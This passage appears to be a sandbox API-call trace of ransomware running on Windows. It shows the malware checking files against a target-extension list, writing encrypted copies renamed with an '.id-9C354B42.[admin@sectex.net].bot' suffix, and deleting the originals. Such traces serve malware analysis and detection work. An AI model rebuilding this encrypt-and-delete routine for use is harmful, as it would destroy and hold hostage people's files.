	[0141.423] SetEndOfFile (hFile=0x3ac) returned 1
	[0141.423] CloseHandle (hObject=0x3ac) returned 1
	[0141.423] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.423] SetEndOfFile (hFile=0x3b4) returned 1
	[0141.425] CloseHandle (hObject=0x3b4) returned 1
	[0141.425] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.426] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\concourse.eftx")) returned 1
	[0141.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81
	[0141.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81
	[0141.426] lstrlenW (lpString=".doc") returned 4
	[0141.426] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.426] lstrlenW (lpString=".docx") returned 5
	[0141.426] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.426] lstrlenW (lpString=".pdf") returned 4
	[0141.426] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.426] lstrlenW (lpString=".xls") returned 4
	[0141.426] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.427] lstrlenW (lpString=".xlsx") returned 5
	[0141.427] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.427] lstrlenW (lpString=".ppt") returned 4
	[0141.427] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81
	[0141.427] lstrlenW (lpString=".zip") returned 4
	[0141.427] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.427] lstrlenW (lpString=".rar") returned 4
	[0141.427] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.427] lstrlenW (lpString=".bz2") returned 4
	[0141.427] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.427] lstrlenW (lpString=".7z") returned 3
	[0141.427] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81
	[0141.427] lstrlenW (lpString=".dbf") returned 4
	[0141.427] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81
	[0141.427] lstrlenW (lpString=".1cd") returned 4
	[0141.427] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81
	[0141.427] lstrlenW (lpString=".jpg") returned 4
	[0141.427] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81
	[0141.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81
	[0141.427] lstrlenW (lpString=".doc") returned 4
	[0141.427] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.427] lstrlenW (lpString=".docx") returned 5
	[0141.427] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.427] lstrlenW (lpString=".pdf") returned 4
	[0141.427] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.427] lstrlenW (lpString=".xls") returned 4
	[0141.427] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.427] lstrlenW (lpString=".xlsx") returned 5
	[0141.427] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.428] lstrlenW (lpString=".ppt") returned 4
	[0141.428] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81
	[0141.428] lstrlenW (lpString=".zip") returned 4
	[0141.428] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.428] lstrlenW (lpString=".rar") returned 4
	[0141.428] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.428] lstrlenW (lpString=".bz2") returned 4
	[0141.428] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.428] lstrlenW (lpString=".7z") returned 3
	[0141.428] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81
	[0141.428] lstrlenW (lpString=".dbf") returned 4
	[0141.428] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81
	[0141.428] lstrlenW (lpString=".1cd") returned 4
	[0141.428] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81
	[0141.428] lstrlenW (lpString=".jpg") returned 4
	[0141.428] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.428] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0141.428] lstrlenW (lpString="Couture.eftx") returned 12
	[0141.428] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\couture.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0141.493] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=1967905) returned 1
	[0141.493] CloseHandle (hObject=0x3a8) returned 1
	[0141.493] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\couture.eftx")) returned 0x20
	[0141.588] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\couture.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.707] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\couture.eftx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\couture.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0141.713] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79
	[0141.713] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79
	[0141.713] lstrlenW (lpString=".doc") returned 4
	[0141.717] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.717] lstrlenW (lpString=".docx") returned 5
	[0141.717] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.717] lstrlenW (lpString=".pdf") returned 4
	[0141.717] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.717] lstrlenW (lpString=".xls") returned 4
	[0141.719] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.720] lstrlenW (lpString=".xlsx") returned 5
	[0141.720] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.720] lstrlenW (lpString=".ppt") returned 4
	[0141.720] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79
	[0141.721] lstrlenW (lpString=".zip") returned 4
	[0141.721] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.721] lstrlenW (lpString=".rar") returned 4
	[0141.721] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.723] lstrlenW (lpString=".bz2") returned 4
	[0141.723] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.723] lstrlenW (lpString=".7z") returned 3
	[0141.723] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79
	[0141.723] lstrlenW (lpString=".dbf") returned 4
	[0141.725] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.726] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79
	[0141.729] lstrlenW (lpString=".1cd") returned 4
	[0141.730] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.730] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79
	[0141.732] lstrlenW (lpString=".jpg") returned 4
	[0141.733] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.733] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79
	[0141.733] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79
	[0141.733] lstrlenW (lpString=".doc") returned 4
	[0141.733] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.733] lstrlenW (lpString=".docx") returned 5
	[0141.733] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.733] lstrlenW (lpString=".pdf") returned 4
	[0141.733] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.733] lstrlenW (lpString=".xls") returned 4
	[0141.733] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.733] lstrlenW (lpString=".xlsx") returned 5
	[0141.733] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.733] lstrlenW (lpString=".ppt") returned 4
	[0141.733] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.733] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79
	[0141.733] lstrlenW (lpString=".zip") returned 4
	[0141.733] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.733] lstrlenW (lpString=".rar") returned 4
	[0141.733] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.733] lstrlenW (lpString=".bz2") returned 4
	[0141.733] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.733] lstrlenW (lpString=".7z") returned 3
	[0141.733] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.733] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79
	[0141.733] lstrlenW (lpString=".dbf") returned 4
	[0141.734] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79
	[0141.734] lstrlenW (lpString=".1cd") returned 4
	[0141.734] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79
	[0141.734] lstrlenW (lpString=".jpg") returned 4
	[0141.734] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.734] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0141.734] lstrlenW (lpString="Elemental.eftx") returned 14
	[0141.734] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\elemental.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0141.763] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=314017) returned 1
	[0141.763] CloseHandle (hObject=0x3c0) returned 1
	[0141.763] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\elemental.eftx")) returned 0x20
	[0141.763] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\elemental.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.763] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\elemental.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0141.763] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.763] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.764] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\elemental.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0141.764] GetLastError () returned 0x0
	[0141.764] ReadFile (in: hFile=0x3c0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x4caa1, lpOverlapped=0x0) returned 1
	[0141.772] WriteFile (in: hFile=0x384, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x4cab0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x4cab0, lpOverlapped=0x0) returned 1
	[0141.777] ReadFile (in: hFile=0x3c0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.778] WriteFile (in: hFile=0x384, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xf0, lpOverlapped=0x0) returned 1
	[0141.778] SetEndOfFile (hFile=0x384) returned 1
	[0141.778] CloseHandle (hObject=0x384) returned 1
	[0141.778] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.778] SetEndOfFile (hFile=0x3c0) returned 1
	[0141.787] CloseHandle (hObject=0x3c0) returned 1
	[0141.787] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.788] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\elemental.eftx")) returned 1
	[0141.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81
	[0141.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81
	[0141.788] lstrlenW (lpString=".doc") returned 4
	[0141.788] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.788] lstrlenW (lpString=".docx") returned 5
	[0141.788] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.788] lstrlenW (lpString=".pdf") returned 4
	[0141.788] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.788] lstrlenW (lpString=".xls") returned 4
	[0141.788] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.788] lstrlenW (lpString=".xlsx") returned 5
	[0141.788] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.788] lstrlenW (lpString=".ppt") returned 4
	[0141.788] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81
	[0141.788] lstrlenW (lpString=".zip") returned 4
	[0141.788] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.788] lstrlenW (lpString=".rar") returned 4
	[0141.788] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.788] lstrlenW (lpString=".bz2") returned 4
	[0141.789] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.789] lstrlenW (lpString=".7z") returned 3
	[0141.789] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81
	[0141.789] lstrlenW (lpString=".dbf") returned 4
	[0141.789] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81
	[0141.789] lstrlenW (lpString=".1cd") returned 4
	[0141.789] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81
	[0141.789] lstrlenW (lpString=".jpg") returned 4
	[0141.789] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81
	[0141.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81
	[0141.789] lstrlenW (lpString=".doc") returned 4
	[0141.789] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.789] lstrlenW (lpString=".docx") returned 5
	[0141.789] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.789] lstrlenW (lpString=".pdf") returned 4
	[0141.789] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.789] lstrlenW (lpString=".xls") returned 4
	[0141.789] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.789] lstrlenW (lpString=".xlsx") returned 5
	[0141.789] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.789] lstrlenW (lpString=".ppt") returned 4
	[0141.789] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81
	[0141.789] lstrlenW (lpString=".zip") returned 4
	[0141.789] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.789] lstrlenW (lpString=".rar") returned 4
	[0141.789] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.789] lstrlenW (lpString=".bz2") returned 4
	[0141.789] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.789] lstrlenW (lpString=".7z") returned 3
	[0141.790] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.790] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81
	[0141.790] lstrlenW (lpString=".dbf") returned 4
	[0141.790] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.790] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81
	[0141.790] lstrlenW (lpString=".1cd") returned 4
	[0141.790] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.790] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81
	[0141.790] lstrlenW (lpString=".jpg") returned 4
	[0141.790] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.790] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0141.790] lstrlenW (lpString="Essential.eftx") returned 14
	[0141.790] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\essential.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0141.791] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=16350) returned 1
	[0141.791] CloseHandle (hObject=0x3c0) returned 1
	[0141.791] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\essential.eftx")) returned 0x20
	[0141.791] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\essential.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.791] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\essential.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0141.792] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.792] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.792] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\essential.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0141.792] GetLastError () returned 0x0
	[0141.792] ReadFile (in: hFile=0x3c0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x3fde, lpOverlapped=0x0) returned 1
	[0141.866] WriteFile (in: hFile=0x384, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x3fe0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x3fe0, lpOverlapped=0x0) returned 1
	[0141.867] ReadFile (in: hFile=0x3c0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.867] WriteFile (in: hFile=0x384, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xf0, lpOverlapped=0x0) returned 1
	[0141.867] SetEndOfFile (hFile=0x384) returned 1
	[0141.871] CloseHandle (hObject=0x384) returned 1
	[0141.871] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.871] SetEndOfFile (hFile=0x3c0) returned 1
	[0141.874] CloseHandle (hObject=0x3c0) returned 1
	[0141.874] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.935] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\essential.eftx")) returned 1
	[0141.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81
	[0141.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81
	[0141.935] lstrlenW (lpString=".doc") returned 4
	[0141.935] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.935] lstrlenW (lpString=".docx") returned 5
	[0141.935] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.935] lstrlenW (lpString=".pdf") returned 4
	[0141.935] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.935] lstrlenW (lpString=".xls") returned 4
	[0141.935] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.935] lstrlenW (lpString=".xlsx") returned 5
	[0141.935] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.935] lstrlenW (lpString=".ppt") returned 4
	[0141.936] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81
	[0141.936] lstrlenW (lpString=".zip") returned 4
	[0141.936] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.936] lstrlenW (lpString=".rar") returned 4
	[0141.936] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.936] lstrlenW (lpString=".bz2") returned 4
	[0141.936] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.936] lstrlenW (lpString=".7z") returned 3
	[0141.936] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81
	[0141.936] lstrlenW (lpString=".dbf") returned 4
	[0141.936] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81
	[0141.936] lstrlenW (lpString=".1cd") returned 4
	[0141.936] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81
	[0141.936] lstrlenW (lpString=".jpg") returned 4
